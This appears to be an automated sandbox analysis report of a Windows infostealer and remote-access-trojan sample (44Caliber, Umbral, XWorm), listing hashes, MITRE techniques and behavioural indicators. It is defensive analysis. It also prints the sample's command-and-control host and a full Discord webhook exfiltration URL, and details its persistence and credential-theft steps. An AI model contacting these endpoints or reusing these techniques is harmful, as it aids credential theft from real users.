44caliber | 366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-09-2024 01:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe
Size

898KB
MD5

ccfa4401df6dcaef4265f5edd06f3fde
SHA1

f96f403087bb1ad5483bc68a5a3db8a1ca833f4e
SHA256

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4
SHA512

02d1efcaaf84cd39c585359edc613daac7d6006adcd714b027d2f9ac5fe8184cb5cc7bb61762cd766d4f409149635d422d8a4b318970c6666e7caf2c16d208ac
SSDEEP

24576:9tZhUkDINlUj3HMcggFUnCwCjsiD5udn3:9tZySIUj3HDgyUCrjsi

Score

10^/10

44caliber umbral xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

stage-von.gl.at.ply.gg:19496

Attributes

Install_directory
%AppData%
install_file
USB.exe

Extracted

Family

44caliber

https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9

Extracted

Family

umbral

https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1260-79-0x0000028DADE60000-0x0000028DADEA0000-memory.dmp	family_umbral
C:\Users\Admin\AppData\Local\Temp\Umbral.exe	family_umbral

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe	family_xworm
behavioral2/memory/2732-27-0x0000000000BF0000-0x0000000000C28000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2636	powershell.exe
4344	powershell.exe
4112	powershell.exe
7140	powershell.exe
6428	powershell.exe
5932	powershell.exe
5672	powershell.exe
2312	powershell.exe
4612	powershell.exe
6628	powershell.exe
5468	powershell.exe
676	powershell.exe
1092	powershell.exe
544	powershell.exe
6980	powershell.exe
4636	powershell.exe
3896	powershell.exe
5712	powershell.exe
6016	powershell.exe

Drops file in Drivers directory 4 IoCs

Processes:

Umbral.exeUmbral.exeUmbral.exeUmbral.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Nursultan2.exeNursultan.exeNursultan2.exeNursultan2.exeNursultan.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeNursultan.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan2.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan2.exeNursultan.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeNursultan.exeNursultan.exeNursultan2.exeNursultan.exeNursultan.exeNursultan.exeNursultan2.exeNursultan2.exeNursultan.exeNursultan.exeNursultan.exeNursultan.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan2.exeNursultan2.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan2.exeNursultan2.exeMicrosoft Edge.exeNursultan.exeNursultan2.exeNursultan2.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Microsoft Edge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Nursultan2.exe

Drops startup file 2 IoCs

Processes:

Microsoft Edge.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk	Microsoft Edge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk	Microsoft Edge.exe

Executes dropped EXE 64 IoCs

Processes:

Nursultan.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeNursultan2.exeInsidious.exeNursultan.exeMicrosoft Edge.exeUmbral.exeInsidious.exeUmbral.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeNursultan2.exeInsidious.exeNursultan.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeInsidious.exeUmbral.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeUmbral.exeNursultan2.exeInsidious.exeNursultan.exeMicrosoft Edge.exeUmbral.exeInsidious.exeMicrosoft Edge.exeNursultan2.exeUmbral.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exe

pid	process
1296	Nursultan.exe
2732	Microsoft Edge.exe
5116	Nursultan2.exe
2536	Nursultan.exe
1756	Nursultan2.exe
2964	Insidious.exe
4788	Nursultan.exe
4728	Microsoft Edge.exe
1260	Umbral.exe
3988	Insidious.exe
4468	Umbral.exe
4388	Microsoft Edge.exe
3436	Nursultan2.exe
2140	Nursultan.exe
4440	Nursultan2.exe
3052	Insidious.exe
3696	Nursultan.exe
1072	Microsoft Edge.exe
3492	Umbral.exe
3444	Nursultan2.exe
4504	Nursultan.exe
3064	Insidious.exe
5004	Microsoft Edge.exe
364	Umbral.exe
3364	Insidious.exe
464	Microsoft Edge.exe
2864	Umbral.exe
1236	Nursultan2.exe
1732	Nursultan.exe
1668	Nursultan2.exe
1600	Nursultan.exe
3220	Insidious.exe
3872	Microsoft Edge.exe
3144	Umbral.exe
2396	Nursultan2.exe
1900	Nursultan.exe
4368	Insidious.exe
740	Microsoft Edge.exe
3448	Umbral.exe
1648	Insidious.exe
4072	Umbral.exe
4856	Microsoft Edge.exe
3952	Nursultan2.exe
620	Nursultan.exe
3988	Insidious.exe
676	Microsoft Edge.exe
4536	Nursultan2.exe
3892	Nursultan.exe
3020	Umbral.exe
5404	Nursultan2.exe
5456	Insidious.exe
5472	Nursultan.exe
5584	Microsoft Edge.exe
5620	Umbral.exe
5992	Insidious.exe
6024	Microsoft Edge.exe
6036	Nursultan2.exe
6060	Umbral.exe
6092	Nursultan.exe
3988	Insidious.exe
4664	Microsoft Edge.exe
1472	Umbral.exe
1604	Nursultan2.exe
1244	Nursultan.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Microsoft Edge.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft Edge"	Microsoft Edge.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

93 discord.com
106 discord.com
107 discord.com
76 discord.com
77 discord.com
90 discord.com

flow	ioc
93	discord.com
106	discord.com
107	discord.com
76	discord.com
77	discord.com
90	discord.com

Looks up external IP address via web service 26 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
18	freegeoip.app
119	freegeoip.app
84	ip-api.com
91	freegeoip.app
29	freegeoip.app
92	freegeoip.app
123	freegeoip.app
15	ip-api.com
57	freegeoip.app
75	freegeoip.app
100	freegeoip.app
105	freegeoip.app
126	freegeoip.app
23	freegeoip.app
66	freegeoip.app
113	freegeoip.app
49	freegeoip.app
108	freegeoip.app
96	freegeoip.app
122	freegeoip.app
24	freegeoip.app
60	ip-api.com
61	freegeoip.app
67	freegeoip.app
101	ip-api.com
117	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXEcmd.exePING.EXEcmd.exePING.EXE

pid process

4652 cmd.exe
620 PING.EXE
6700 cmd.exe
6672 PING.EXE
2208 cmd.exe
6812 PING.EXE

pid	process
4652	cmd.exe
620	PING.EXE
6700	cmd.exe
6672	PING.EXE
2208	cmd.exe
6812	PING.EXE

Checks processor information in registry 2 TTPs 32 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Insidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
4920	timeout.exe
2224	timeout.exe
5068	timeout.exe
1088	timeout.exe
5244	timeout.exe
2976	timeout.exe
2356	timeout.exe
1732	timeout.exe
4304	timeout.exe
7056	timeout.exe
5864	timeout.exe
5172	timeout.exe
5244	timeout.exe
5840	timeout.exe
4556	timeout.exe
4376	timeout.exe
6800	timeout.exe
3660	timeout.exe
2268	timeout.exe
6108	timeout.exe
2044	timeout.exe
3976	timeout.exe
1968	timeout.exe
4048	timeout.exe
3164	timeout.exe
432	timeout.exe
6488	timeout.exe
1980	timeout.exe
1100	timeout.exe
436	timeout.exe
2224	timeout.exe
3028	timeout.exe
4956	timeout.exe
3484	timeout.exe
4620	timeout.exe
3620	timeout.exe
5872	timeout.exe
6056	timeout.exe
3540	timeout.exe
5532	timeout.exe
5740	timeout.exe
6436	timeout.exe
3036	timeout.exe
4392	timeout.exe
1764	timeout.exe
6656	timeout.exe
6132	timeout.exe
4636	timeout.exe
6596	timeout.exe
6044	timeout.exe
4784	timeout.exe
6996	timeout.exe
5320	timeout.exe
3608	timeout.exe
1792	timeout.exe
5632	timeout.exe
2312	timeout.exe
5632	timeout.exe
2544	timeout.exe
5180	timeout.exe
3704	timeout.exe
5284	timeout.exe
676	timeout.exe
5168	timeout.exe

Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exewmic.exe

pid process

4288 wmic.exe
5572 wmic.exe
5336 wmic.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

620 PING.EXE
6672 PING.EXE
6812 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

6024 schtasks.exe

pid	process
4288	wmic.exe
5572	wmic.exe
5336	wmic.exe

pid	process
620	PING.EXE
6672	PING.EXE
6812	PING.EXE

pid	process
6024	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Insidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exepowershell.exepowershell.exeInsidious.exepowershell.exepowershell.exeMicrosoft Edge.exeInsidious.exeInsidious.exe

pid	process
2964	Insidious.exe
2964	Insidious.exe
2964	Insidious.exe
3988	Insidious.exe
3988	Insidious.exe
3052	Insidious.exe
3052	Insidious.exe
3052	Insidious.exe
3064	Insidious.exe
3064	Insidious.exe
3064	Insidious.exe
3364	Insidious.exe
3364	Insidious.exe
3364	Insidious.exe
3220	Insidious.exe
3220	Insidious.exe
3220	Insidious.exe
2964	Insidious.exe
2964	Insidious.exe
4368	Insidious.exe
4368	Insidious.exe
4368	Insidious.exe
1648	Insidious.exe
1648	Insidious.exe
1648	Insidious.exe
1648	Insidious.exe
3988	Insidious.exe
3988	Insidious.exe
3988	Insidious.exe
1648	Insidious.exe
5456	Insidious.exe
5456	Insidious.exe
5456	Insidious.exe
5456	Insidious.exe
5992	Insidious.exe
5992	Insidious.exe
5992	Insidious.exe
3988	Insidious.exe
3988	Insidious.exe
3988	Insidious.exe
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
3896	powershell.exe
3896	powershell.exe
3896	powershell.exe
5548	Insidious.exe
5548	Insidious.exe
5548	Insidious.exe
5712	powershell.exe
5712	powershell.exe
5712	powershell.exe
6016	powershell.exe
6016	powershell.exe
6016	powershell.exe
5456	Insidious.exe
2732	Microsoft Edge.exe
2732	Microsoft Edge.exe
4856	Insidious.exe
4856	Insidious.exe
4856	Insidious.exe
5640	Insidious.exe
5640	Insidious.exe
5640	Insidious.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Microsoft Edge.exeMicrosoft Edge.exeInsidious.exeUmbral.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exepowershell.exepowershell.exeInsidious.exeMicrosoft Edge.exepowershell.exepowershell.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exeInsidious.exe

description	pid	process
Token: SeDebugPrivilege	2732	Microsoft Edge.exe
Token: SeDebugPrivilege	4728	Microsoft Edge.exe
Token: SeDebugPrivilege	2964	Insidious.exe
Token: SeDebugPrivilege	1260	Umbral.exe
Token: SeDebugPrivilege	3988	Insidious.exe
Token: SeDebugPrivilege	4388	Microsoft Edge.exe
Token: SeDebugPrivilege	3052	Insidious.exe
Token: SeDebugPrivilege	1072	Microsoft Edge.exe
Token: SeDebugPrivilege	3064	Insidious.exe
Token: SeDebugPrivilege	5004	Microsoft Edge.exe
Token: SeDebugPrivilege	3364	Insidious.exe
Token: SeDebugPrivilege	464	Microsoft Edge.exe
Token: SeDebugPrivilege	3220	Insidious.exe
Token: SeDebugPrivilege	3872	Microsoft Edge.exe
Token: SeDebugPrivilege	4368	Insidious.exe
Token: SeDebugPrivilege	740	Microsoft Edge.exe
Token: SeDebugPrivilege	1648	Insidious.exe
Token: SeDebugPrivilege	4856	Microsoft Edge.exe
Token: SeDebugPrivilege	3988	Insidious.exe
Token: SeDebugPrivilege	676	Microsoft Edge.exe
Token: SeDebugPrivilege	5456	Insidious.exe
Token: SeDebugPrivilege	5584	Microsoft Edge.exe
Token: SeDebugPrivilege	5992	Insidious.exe
Token: SeDebugPrivilege	6024	Microsoft Edge.exe
Token: SeDebugPrivilege	3988	Insidious.exe
Token: SeDebugPrivilege	4664	Microsoft Edge.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
